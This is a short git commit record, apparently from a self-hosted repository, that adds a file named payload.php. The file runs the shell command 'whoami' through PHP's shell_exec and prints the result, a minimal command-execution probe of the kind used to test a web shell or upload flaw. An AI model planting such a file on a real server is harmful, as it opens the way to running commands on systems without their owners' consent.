payload php

This commit is contained in:
Server (Felix) 2020-12-04 10:54:05 +01:00
parent e35524fa19
commit df8e4ad01c

3
payload.php Normal file
View File

@ -0,0 +1,3 @@
<?php
echo shell_exec('whoami');
?>